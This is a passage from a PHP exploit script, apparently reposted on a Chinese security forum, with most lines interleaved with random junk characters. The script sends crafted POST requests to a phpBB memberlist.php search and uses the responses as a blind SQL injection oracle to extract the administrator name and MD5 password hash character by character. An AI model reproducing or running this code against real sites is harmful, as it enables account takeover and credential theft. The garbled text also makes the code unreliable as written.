& i+ p1 m# Y9 [6 m" N5 B  w$data.="&amp;submit=Search";
9 z% ]7 `. p  f4 w! J3 Y7 T+ c$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0. j, Z1 I7 C" f* k
"; - p8 A! ^) }+ {3 _# p2 A  `, x( h
$packet.="Content-Type: application/x-www-form-urlencoded% S' u5 J! M; L5 ~' W
"; ! l) }1 Q6 O: U
$packet.="Host: ".$host."
% X; q6 z0 H+ f( {% m  X"; ; U. _. |6 q0 P' ]- L& h
$packet.="Content-Length: ".strlen($data)."
3 ]- u/ V% O/ Y* ["; 5 N1 t. d( ?9 G
$packet.="Connection: Close) r' g, a- F3 l# W4 C1 q
"; ! x/ t; K% ?; D
$packet.="Cookie: ".$cookie." & q7 }+ Y& Y+ ?0 F2 y
3 F0 f) U) k/ ?9 h, c
";
: ?9 o  v0 @% a- M4 I& e6 K$ F$packet.=$data;
+ [# Y: M/ }' f. I0 ~sendpacketii($packet);
0 P/ A1 w% d; G5 oif (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]- k, r; ?/ F, u6 ?
";sleep(2);break;}
1 m7 h7 n! x9 D8 m6 M1 a; G, V}
0 ?5 v2 F& h  Z8 v1 Y: ~3 gif ($i==255) {die("Exploit failed...");} 9 a# T. |& d% q" U. S( e) E
$j++;
8 `* P1 L9 P: H/ t0 p* O" k} 1 A, C) d: o% A3 o1 q
echo "--------------------------------------------------------------------
# d, H# V7 `1 U% w6 S; V: r/ s"; 0 H6 z! s9 K" K- Q) U1 f
echo "admin -> ".$admin."
0 d; @- B$ q4 ]7 y) ?) r"; 1 n4 Q  ?$ b/ Q' a; p2 [
echo "password (md5) -> ".$password."2 u# K& ~; x6 m* |! ^$ E2 S: c1 o
"; & a$ x. [* p, ]  n/ u$ R
echo "--------------------------------------------------------------------5 `9 `" A5 |' U, u' ]/ m3 g
";
& z0 Q$ ?8 K! A6 _4 |$ g) H/ T- J! ^function is_hash($hash) 6 K7 p; l9 x7 ~- b7 |+ e- J
{ % T( v, J3 T* Y' o7 Z* J
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
# O2 p, ?% r) y/ kelse {return false;}
$ Q2 T: z6 J9 p7 R8 B- R1 z; r0 E} . Q. d0 P+ k( j& E$ [- O3 {
if (is_hash($password)) {echo "Exploit succeeded...";} + H8 Q% A: d) _2 R* [
else {echo "Exploit failed...";}
! p3 n- N* G1 }?>
. W+ _1 e' n' _# I: Y; _) G
1 C0 V* U7 u2 V. ]: t' q, X; Y& w0 L7 w5 k' {$ [/ Q% }4 f
) y$ l; A$ I; {+ P  _- v0 s
  M4 r3 `5 H8 A* o0 n
; ~2 P4 V  R- W% y! ]: U" B
! [- f5 s- ~/ U/ X: K1 d

/ ~5 _. z! O$ f1 k9 o" m( y# U: c" e! J
2 ~; P; j2 c3 ^% w+ g
# Z2 g& q2 P" |- t% e* Y# X; i

2 E. A2 H" @: e+ J* m9 S9 A) n- J5 B7 \/ C, H

# n$ z% H, N9 I# L+ `# j# J
; ]$ |. j" S4 b1 }% t( L$ g
, N+ q& G4 D6 |4 E; v3 L4 ]8 l" I  C' T

3 u0 [* b7 R. N! n+ \+ t; m$ H' h# n3 @/ K3 m8 X
公告:https://www.sitedirsec.com公布最新漏洞,请关注




欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://sitedirsec.com/) Powered by Discuz! 7.2